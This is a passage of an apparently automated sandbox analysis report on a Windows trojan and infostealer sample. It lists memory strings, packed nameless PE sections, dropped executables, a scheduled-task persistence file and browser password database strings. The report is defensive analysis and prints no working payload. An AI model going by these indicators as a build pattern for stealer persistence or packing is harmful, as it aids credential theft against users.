Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: EZrw1nNIpG.exe, 00000000.00000002.2417623775.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org#
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .idata
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
PE file has nameless sections
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C82B700
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C82B8C0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C82B910
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7CF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C35A0 0_2_6C7C35A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8234A0 0_2_6C8234A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C4A0 0_2_6C82C4A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D5440 0_2_6C7D5440
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C806CF0 0_2_6C806CF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83AC00 0_2_6C83AC00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C805C10 0_2_6C805C10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C812C10 0_2_6C812C10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CD4E0 0_2_6C7CD4E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83542B 0_2_6C83542B
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7ED4D0 0_2_6C7ED4D0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D64C0 0_2_6C7D64C0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83545C 0_2_6C83545C
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D6C80 0_2_6C7D6C80
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C800DD0 0_2_6C800DD0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F0512 0_2_6C7F0512
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EED10 0_2_6C7EED10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8285F0 0_2_6C8285F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DFD00 0_2_6C7DFD00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82E680 0_2_6C82E680
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CC670 0_2_6C7CC670
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C824EA0 0_2_6C824EA0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E9E50 0_2_6C7E9E50
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E4640 0_2_6C7E4640
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8376E3 0_2_6C8376E3
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C815600 0_2_6C815600
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CBEF0 0_2_6C7CBEF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DFEF0 0_2_6C7DFEF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C807E10 0_2_6C807E10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C829E30 0_2_6C829E30
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C812E4E 0_2_6C812E4E
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C803E50 0_2_6C803E50
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C836E63 0_2_6C836E63
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E5E90 0_2_6C7E5E90
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8177A0 0_2_6C8177A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D9F00 0_2_6C7D9F00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F6FF0 0_2_6C7F6FF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C807710 0_2_6C807710
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CDFE0 0_2_6C7CDFE0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E8850 0_2_6C7E8850
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7ED850 0_2_6C7ED850
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8350C7 0_2_6C8350C7
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8058E0 0_2_6C8058E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D7810 0_2_6C7D7810
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EC0E0 0_2_6C7EC0E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80B820 0_2_6C80B820
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C814820 0_2_6C814820
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F60A0 0_2_6C7F60A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80F070 0_2_6C80F070
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C805190 0_2_6C805190
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C822990 0_2_6C822990
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DD960 0_2_6C7DD960
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EA940 0_2_6C7EA940
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FD9B0 0_2_6C7FD9B0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CC9A0 0_2_6C7CC9A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C81B970 0_2_6C81B970
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83B170 0_2_6C83B170
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83BA90 0_2_6C83BA90
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C832AB0 0_2_6C832AB0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C808AC0 0_2_6C808AC0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80E2F0 0_2_6C80E2F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E1AF0 0_2_6C7E1AF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DCAB0 0_2_6C7DCAB0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C22A0 0_2_6C7C22A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F4AA0 0_2_6C7F4AA0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C809A60 0_2_6C809A60
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DC370 0_2_6C7DC370
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C5340 0_2_6C7C5340
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8353C8 0_2_6C8353C8
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80D320 0_2_6C80D320
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CF380 0_2_6C7CF380
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00262818 10_2_00262818
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00224CD0 10_2_00224CD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00257533 10_2_00257533
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00266E0B 10_2_00266E0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_002666B9 10_2_002666B9
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00224AD0 10_2_00224AD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00267ED0 10_2_00267ED0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00266F2B 10_2_00266F2B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00262380 10_2_00262380
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210000 13_2_7F210000
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F2109B9 13_2_7F2109B9
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: String function: 6C7FCBE8 appears 134 times
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: String function: 6C8094D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: EZrw1nNIpG.exe, 00000000.00000002.2418828385.000000006CA45000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs EZrw1nNIpG.exe
Source: EZrw1nNIpG.exe, 00000000.00000002.2417944782.000000006C852000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs EZrw1nNIpG.exe
Uses 32bit PE files
Source: EZrw1nNIpG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.9994998094512195
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.99383544921875
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: amadka[1].exe.0.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: KKEBKJJDGH.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: KKEBKJJDGH.exe.0.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: explortu.exe.8.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: explortu.exe.8.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9935302734375
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9935302734375
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: explortu.exe.8.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: KKEBKJJDGH.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/30@0/3
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C827030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C827030
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: EZrw1nNIpG.exe, 00000000.00000003.2247294432.0000000022E94000.00000004.00000020.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000003.2262587560.0000000022E88000.00000004.00000020.00020000.00000000.sdmp, DGHIDAFCGIEHIEBFCFBA.0.dr, HCGCAAKJDHJJJJJKKKFB.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
